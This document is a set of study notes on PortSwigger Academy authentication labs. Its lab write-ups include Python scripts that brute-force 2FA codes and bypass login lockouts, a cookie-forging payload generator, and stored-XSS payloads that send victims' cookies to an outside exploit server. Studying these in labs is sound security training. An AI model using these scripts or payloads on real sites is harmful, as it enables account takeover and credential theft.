[TOC] # Basic Concept ## Logic Views Stealing password reset tokens.  ## Authentication Factors Common Authenticated factors **We know** - password **We Have** - Mobile phone or security token **We can do** - Biometrics or behavior ## Authentication && Authorization **Authentication** Authentication is a process of Verifying the user identity **Authorization** Once the user is authenticated, their privileges determine what they are authorize to do. ## Vulnerabilities Arise ### No brute force Protection ### Program Logic Flaws Program allows attacker leverage Unexpected behavior to bypass Auth. ## Impact ### low Privilege Accounts Low privilege account allow attacker to steal the personal information, money .... ### Admin Account (Goal) Once we have admin account, we can attempt to modify the the website configuration, to upload the web shell Find out a way to Run Arbitrary code in website. # Password-based Vulnerabilities ## Weakness It allow attack to enumerate username and crack password by brute-force Attack ## Brute Force Attack ### Username Enumeration This vulnerability typically occurs in forget password page! ``` admin@somecompany.com ``` ### Password Policy (High-Entropy password) If website allow us to register the account We can exploit the functionality to understand password policies ### Observation When we perform Brute Force Attacke - Statue code - Error message - Response time ### LAB-1 Username Enumeration (Response Length) Username Directory https://portswigger.net/web-security/authentication/auth-lab-usernames Password Directory https://portswigger.net/web-security/authentication/auth-lab-passwords Login Page ``` POST /login HTTP/2 Host: 0a1300be03e9f1b4808fbcf60064005d.web-security-academy.net Cookie: session=RyZyjhbAo71qMSKopNdoJ2k9ntbDU7C1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0 Content-Type: application/x-www-form-urlencoded Content-Length: 40 Origin: https://0a1300be03e9f1b4808fbcf60064005d.web-security-academy.net Referer: https://0a1300be03e9f1b4808fbcf60064005d.web-security-academy.net/login username=meowehecker&password=meowhecker ``` Response(Error Message)  Invalid username -> Error message #### Enumerate User name Configuration    Perform Attack   User Name: auto (Valid) #### Password Cracking   --- sunshine -> Status code 302(Template Redirection)  username:auto password:sunshine   Solved --- ### LAB 2 Username enumeration via subtly different responses Username Directory https://portswigger.net/web-security/authentication/auth-lab-usernames Password Directory https://portswigger.net/web-security/authentication/auth-lab-passwords Analysis Request/Response  **Username Enumeration** Payload Setting  **Find Password**   password:killer **login** account:archie password:killer   Solve ## Bypass IP-base Protection X-Forwarded-for header is used to tell the back-end service what the client Ip ``` X-Forwarded-For ``` Sample code ```javascript const express = require('express'); const app = express(); app.get('/', (req, res) => { // req.headers['x-forwarded-for']='10.10.10.1' const clientIp = req.headers['x-forwarded-for'] || req.connection.remoteAddress; res.send(`Client IP: ${clientIp}`); }); app.listen(3000, () => { console.log('Server listening on port 3000'); }); ``` ``` npm install express node "app.js" ``` ```bash curl -H "X-Forwarded-For:10.10.10.1" 127.0.0.1:3000 ```  ### Lab-1: Brute-force (Response Time ) && Bypass IP-Base Protection - Your credentials: `wiener:peter` - [Candidate usernames](https://portswigger.net/web-security/authentication/auth-lab-usernames) - [Candidate passwords](https://portswigger.net/web-security/authentication/auth-lab-passwords) #### Site map  #### Dynamic Parameters ``` /login /post ```  #### Restriction  #### Bypass the limit Restriction Way1 Ip bypass ``` X-Forwarded-For:x ``` #### Enumerate Username Via Response Time Attack Type -> Pichfork Position 1 -> X-Forwarded-For Value Position 2 -> Enumerate User Name  Potential Password  ``` username=ao&password=MEOWHACKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKHACKEHACKERhhhhhhhhhhhhhhhhhhhhhhhhACKER ``` Username:ao #### Exploit - Crack Password  ``` Password:michael ``` **Login**  Solve !!! ## Bypass flawed Brute force protection Comment Protection Way ### Locking Account Access Bypass Ways - Password spray ### IP Block Bypass Ways - X-Forwarded-FOR Header - If the website will reset the record of login, Once we login successfully. we cad register a valid account, and adding it into our wordlist ### LAB-1 Broken Brute-Force Protection (IP Block) #### Site Map  #### Dynamic Parameters  #### Identify ``` Post /login ```  Attempt Limit = 3  #### Bypass Attempting Use X-Forwarded-For  Failed --- Attempting use reset mechanism to bypass Limit Valid Account `winner:petter` Bypass wordlist ```python #!/usr/bin/python3 # Explioit - Reset Mechanism # Some sysetms will reset the limt Counter When the user login successfully import argparse import traceback class Color: HEADER = '\033[95m' BLUE = '\033[94m' GREEN = '\033[92m' WARNING = '\033[93m' FAIL = '\033[91m' ENDC = '\033[0m' def moewBanner(): print(Color.HEADER + "##################################################") print("# #") print("# " + Color.GREEN + "MeowHecker is a cat. ^O^" + Color.HEADER + " #") print("# #") print("##################################################" + Color.ENDC) print(Color.WARNING+"-> Author: Meowhecker\n" + Color.ENDC) def readWordlistToList(filePath): list = [] try: with open(filePath, "r") as wordlist: for line in wordlist: list.append(line.rstrip()) # Remove "/n" print("List:", list) wordlist.close() return list except FileNotFoundError: print("File not found:", filePath) except Exception as e: print("Error", e) def MakeBypassWordList(originalWordList,BypassWordlistPath,attemptLimit): with open(BypassWordlistPath,'w') as bypassWordlist: for Counter, line in enumerate(originalWordList,start=1): #Using Enumereate Function to traverse whole list and assing index ! (Start Counter = 1) bypassWordlist.write(line+'\n') # Condiction -> Insert Valid String. if Counter % (attemptLimit-1) == 0: #print("Insert", valid, "in bypassWordlist") bypassWordlist.write(valid+'\n') print("BypassWordlist Done !") bypassWordlist.close() return Counter # Number of lines (For Making usernameList) def MakeUsernameWordlist(TargetUserName, ValidUserName, bypassWordlistLinsNum,attemptLimit): with open(userWordlistPath,'w') as userWordlist: Counter = 1 for line in range(bypassWordlistLinsNum): userWordlist.write(TargetUserName+'\n') if Counter % (attemptLimit-1) == 0 : #print("Insert", ValidUserName, "in userWordlist") userWordlist.write(ValidUserName+'\n') Counter = Counter + 1 print("UserWordlist - Done !") userWordlist.close() # Main() !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! # Configure Parameters parsers = argparse.ArgumentParser(description='Meowhecker is a Cat') parsers.add_argument("attemptLimit", type=int) parsers.add_argument("valid", type= str) parsers.add_argument("targetUserName", type=str) parsers.add_argument("validUserName", type=str) parsers.add_argument("-O", "--originalWordList", default="./defaultWordlist.txt") parsers.add_argument("-B", "--bypassWordlist", default="./bypassWordlist.txt") parsers.add_argument("-U", "--userWordlist", default="./userWordlist.txt") args = parsers.parse_args() originalWordList = args.originalWordList BypassWordlistPath = args.bypassWordlist attemptLimit = args.attemptLimit valid = args.valid targetUserName= args.targetUserName validUserName = args.validUserName userWordlistPath = args.userWordlist moewBanner() DefaultWordList = readWordlistToList(originalWordList) bypassWordlistLinsNum = MakeBypassWordList(DefaultWordList,BypassWordlistPath,attemptLimit) MakeUsernameWordlist(targetUserName,validUserName,bypassWordlistLinsNum, attemptLimit) ``` Run the Following Command ``` python3 addingValidBypassIpBlock.py 2 peter carlos wiener ```  Treads = 1 (Notice!!!)    #### Login  Successfully ### LAB-2 Enumerate Username Via Account Lock #### Site Map  #### Dynamic Parameters  #### Identify Confirm Defense Mechanisms  Testing the website whether have account lock   Website have Account locked Username:albuquerque Crack the password  Attempt login Website via ``` albuquerque:1qaz2wsx ``` Login  solved ## Limit Rate Limit rate restriction typically through ip block to defense malicious IP. Bypass Way 1. Base on time controller script. 2. Carry Multiple Credential in Single HTTP request. 3. Race Condition ### LAB-1 Bypass Limit Rate via Multiple Credential Per Request. #### Site Map  #### Dynamic Parameters  #### Identify **Confirm Defense Mechanisms** IP Block / Limit Rate  -> Json format (Credentials) **Bypass** Carry Multiple credential in one Http Request Convert Wordlist.txt to json list ```python import json filePath = "./wordlist.txt" class Color: HEADER = '\033[95m' BLUE = '\033[94m' GREEN = '\033[92m' WARNING = '\033[93m' FAIL = '\033[91m' ENDC = '\033[0m' def moewBanner(): print(Color.HEADER + "##################################################") print("# #") print("# " + Color.GREEN + "MeowHecker is a cat. ^O^" + Color.HEADER + " #") print("# #") print("##################################################" + Color.ENDC) print(Color.WARNING+"-> Author: Meowhecker\n" + Color.ENDC) def readWordlistToList(filePath): list = [] try: with open(filePath, "r") as wordlist: for line in wordlist: list.append(line.rstrip()) # Remove "/n" #print("List:", list) wordlist.close() return list except FileNotFoundError: print("File not found:", filePath) except Exception as e: print("Error", e) def converListToJson(pythonList): if pythonList: jsonList = json.dumps(pythonList) return jsonList else: print("No python list") return None # Main function moewBanner() wordlist = readWordlistToList(filePath) jsonList = converListToJson(wordlist) print("JSON list:", jsonList) ``` Result  #### Exploit    Solved # Multi-Factor Authentication-Vulnerabilities ## 2FA Two Factor Authentication Flawed Design: Email VC + Password (Knowledge Authentication) -> ## Two-factor authentication tokens (Password - We know) (Device Verify Code - We have) Attacks 1.SIM Card Hijack 2.Message Intercept ### LAB-1 Bypassing via Session check flawed Valid Credentials -> wiener:peter Target Accounts -> carlos:montoya #### Site Map  #### Dynamic Parameters  #### Identify   **Confirm Defense Mechanisms** Website have 2 FA Authentication Flaw Design -> Password (We know) -> Email code (We know) Bypass Possible ! **Bypass** Test:1 Testing parameter to Carlos (IDOR)  Faill !! Page will be redirect to login page --- Test:2 Testing Session parameter    Work /Account Page didn't check the session whether have login2 check flag & IDOR -> Allow us to bypass email code check ! #### Exploit Login Carlos Account    Solved! ## Flawed Two-Factor Verification Logic  ### LAB-1 Get/ login2 Can trigger carlos email valid code (Flawed Logic) credentials: wiener:peter Victim's username: carlos #### Site Map  #### Dynamic Parameters  #### Identify Testing Authentication Functionality. **Confirm Defense Mechanisms** Website have 2 FA Authentication Flaw Design -> Password (We know) -> Email code (We know) (Get/login2 ) Same Factor Auth! **Bypass**    Brute Forcing -> Guessing Valid Code  We Found  Another Way ```python= #Author: MeowHecker 侯智晟 # Bypass 2FA Auth import requests import threading import sys url = "https://0ae900ed033f23288166aceb000b003c.web-security-academy.net/login2" Headers = {'Host': ' 0ae900ed033f23288166aceb000b003c.web-security-academy.net', 'Cookie': ' verify=carlos; session=706d8zav60yMRSaANT9QUOdIQVYkXLhw', 'Content-Length': ' 13', 'Cache-Control': ' max-age=0', 'Sec-Ch-Ua': ' "Not_A Brand";v="8", "Chromium";v="120"', 'Sec-Ch-Ua-Mobile': ' ?0', 'Sec-Ch-Ua-Platform': ' "Windows"', 'Upgrade-Insecure-Requests': ' 1', 'Origin': ' https://0ae900ed033f23288166aceb000b003c.web-security-academy.net', 'Content-Type': ' application/x-www-form-urlencoded', 'User-Agent': ' Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.199 Safari/537.36', 'Accept': ' text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7', 'Sec-Fetch-Site': ' same-origin', 'Sec-Fetch-Mode': ' navigate', 'Sec-Fetch-User': ' ?1', 'Sec-Fetch-Dest': ' document', 'Referer': ' https://0ae900ed033f23288166aceb000b003c.web-security-academy.net/login2', 'Accept-Encoding': ' gzip, deflate, br', 'Accept-Language': ' zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7', 'Priority': ' u=0, i'} Request Times = 0 def sendRequest(payload,sem): global Request Times payloads = { "Payload": payload } # Send request and save Response response = requests.post(url,headers = Headers,data=payloads) print(f'Request Times{Request Times}:stauts code:{response.status_code} payloads: {payload}') Request Times = Request Times + 1 # Target / Success ? (Status code) if(response.status_code != 200): # Found !!!!!!! print(f"Payload: {payload}, Response: {response.text}") sys.exit() sem.release() # Release Singal sys.exit() # Termerate Threading Process def threadingF(): maxThreading = 20 sem = threading.BoundedSemaphore(maxThreading) for i in range(10000): # Custom Payload payload = str(i).zfill(4) sem.acquire() sendRequestHandler = threading.Thread(target=sendRequest, args=(payload,sem)) sendRequestHandler.start() print("Number of active threads:", threading.active_count()) sys.exit() threadingF() sys.exit() ``` #### Exploit  Solved ### LAB-2 2FA Bypassing CSRF Token Victim's credentials: `carlos:montoya` #### Site Map #### Dynamic Parameters #### Identify **Confirm Defense Mechanisms** CSRF Token! But CSRF can't not defense  Using macro automatically greps token **Bypass**  Using Macro to handle CSRF problems    #### Exploit Notice As Each we test the validation code will be reset, we may need to repeat the attack several time Treads = 1 # Other Authentication Mechanism ## Cookie Login ! Keep User login functionality typically is implemented by cookie If cookie value can be analysis, we can guess the victim's cookie and login as victim identity Cookie - Flawed design -> Encode -> Hash (Not with salt ) ### LAB-1 Brute-forcing / Stay-Logged-in cookie can be cracked Valid credentials: wiener:peter Victim's username: carlos https://portswigger.net/web-security/authentication/auth-lab-passwords #### Site Map  #### Dynamic Parameters  #### Identify  **Confirm Defense Mechanisms** Basic Password Auth User cookie not be Correctly encrypted !! **Bypass** Analysis Stay-login Cookie  Base64 Decoded !! ``` wiener:51dc30ddc473d43a6011e9ebba6ca770 ```  Password be hashed by md5 #### Exploit ```python= import hashlib import base64 class Banner: HEADER = '\033[95m' BLUE = '\033[94m' GREEN = '\033[92m' WARNING = '\033[93m' FAIL = '\033[91m' ENDC = '\033[0m' def __init__(self): self.meow_banner() def meow_banner(self): print(self.HEADER + "##################################################") print("# #") print("# " + self.GREEN + "MeowHecker is a cat. ^O^" + self.HEADER + " #") print("# #") print("##################################################" + self.ENDC) print(self.WARNING + "-> Author: Meowhecker\n" + self.ENDC) def readWordlistToList(filePath): list = [] try: with open(filePath, "r") as wordlist: for line in wordlist: list.append(line.rstrip()) # Remove "/n" #print("List:", list) wordlist.close() return list except FileNotFoundError: print("File not found:", filePath) except Exception as e: print("Error", e) def readWordlistToHashList(wordlist): hashList = [] for string in wordlist: hashString = hashlib.md5(string.encode()).hexdigest() # md5 input must be Binary String(b"string" - 0~255) hashList.append(hashString) print(hashList) return hashList def writeHashListToFile(hashList,hashFilePath): with open(hashFilePath, 'w') as hashFile: for hash in hashList: hashFile.write(hash + '\n') print(hashList) hashFile.close() def addingPrifixBase64Encode(hashList): finalPayloadList = [] for hash in hashList: prifixAndPass = 'carlos:'+hash Encode = base64.b64encode(prifixAndPass.encode()).decode() finalPayloadList.append(Encode) return finalPayloadList def writeFinalPayloadToFile(finalPayloadList,finalPayloadPath): with open(finalPayloadPath, 'w') as hashFile: for hash in finalPayloadList: hashFile.write(hash + '\n') hashFile.close() banner=Banner() filePath="./wordlist.txt" hashFilePath="./hashList.txt" finalPayloadPath ="./finalPayload.txt" wordlist=readWordlistToList(filePath) hashList = readWordlistToHashList(wordlist) writeHashListToFile(hashList,hashFilePath) finalPayloadList = addingPrifixBase64Encode(hashList) writeFinalPayloadToFile(finalPayloadList,finalPayloadPath) ``` 這個LAB 壞了 A ### Lab - 2 Offline Password Cracking #### Site Map  #### Dynamic Parameters  #### Identify  **Confirm Defense Mechanisms** No HTTP only Cookie can be cracked (base64 + hash) **Bypass** Testing comment functionality to find the place to execute javascript We need to do two things 1. Grep the Victim cookie via javascript 2. Passing Victim cookie to our server listener.  ```html <svg onload=prompt()> ```  Successful ```html <svg onload=alert(document.cookie)> ```  Store XSS Found ! #### Exploit Exploit XSS vulnerability to execute arbitrary JavaScript Pass the Victim's cookie to exploit server Payload work ``` <svg onload= document.location='//exploit-0a9500bb032c0b9680c634b101d400fc.exploit-server.net/exploit?log='+document.cookie></svg> ``` Work ``` <script>window.location.href = "https://exploit-0a9c0098048473df859011c101d70033.exploit-server.net/exploit?log=" + document.cookie;</script> ``` Work Victim Cookie ``` secret=O9VA9feGEVoEVmm1Lm0R37IwAUMzQhqO;%20stay-logged-in=Y2FybG9zOjI2MzIzYzE2ZDVmNGRhYmZmM2JiMTM2ZjI0NjBhOTQz ``` Base64 Decode ``` secret=;Õ@õ÷†ZViµ.mß²0
C3BŽ;%ÛK-k-–ˆ y-in=carlos:26323c16d5f4dabff3bb136f2460a943 ``` login as victim Cookie -> ``` stay-logged-in=Y2FybG9zOjI2MzIzYzE2ZDVmNGRhYmZmM2JiMTM2ZjI0NjBhOTQz ``` Not Work Crack Cookie  Login  ``` carlos onceuponatime ```   Solved ! ## Resetting password Mechanism ### Send password by email Some website will send the password to mail User have multiple device which will automatically sync their mail box, we can intercept the mail if the mail pass cross insecure channel ### Resetting password via URL ``` http://vulnerable-website.com/reset-password?user=Valid-user ``` Reset page will check the token whether are valid ``` http://vulnerable-website.com/reset-password?token=a0ba0d1cb3b63d13822572fcff1a241895d893f659164d4cc550b421ebdd48a8 ``` If token match -> Redirect to reset page ### LAB 1: Refresh From To bypass token check Credentials: wiener:peter Victim's username: carlos #### Site Map  #### Dynamic Parameters  #### Identify **Confirm Defense Mechanisms** Reset password require -> Token (It can receive from mail) **Bypass**  #### Exploit   Solved ! ### LAB-2 Password Reset Poisoning via (Proxy, X-Forward-For Injection) #### Site Map  #### Dynamic Parameters  #### Identify  Website -> Have Proxy Attack Vector - X-Forwarded-Host (Record Client Domain)  **Confirm Defense Mechanisms** Password require reset token(Email) **Bypass**  If reset password domain can manipulate by our Header inject, It may allow us to change the Victim password #### Exploit   ``` bx8yy156n1xo1vl84kgdio2hxz6od0kx ```   Solved ## User Password Change Mechanism Flawed Design: Some website will use hide user value to identify who want to change password. ### LAB-3 Passing Current User Parameter in Password Change Your credentials: wiener:peter Victim's username: carlos #### Site Map  #### Dynamic Parameters  #### Identify **Flawed Design** Password change parameter shouldn't pass current user parameter    **Confirm Defense Mechanisms** **Bypass** #### Exploit   ``` carlos moscow ```  Solved ! <!-- #### Site Map #### Dynamic Parameters #### Identify **Confirm Defense Mechanisms** **Bypass** #### Exploit --> Owner 侯智晟 meowheckerouo@gmail.com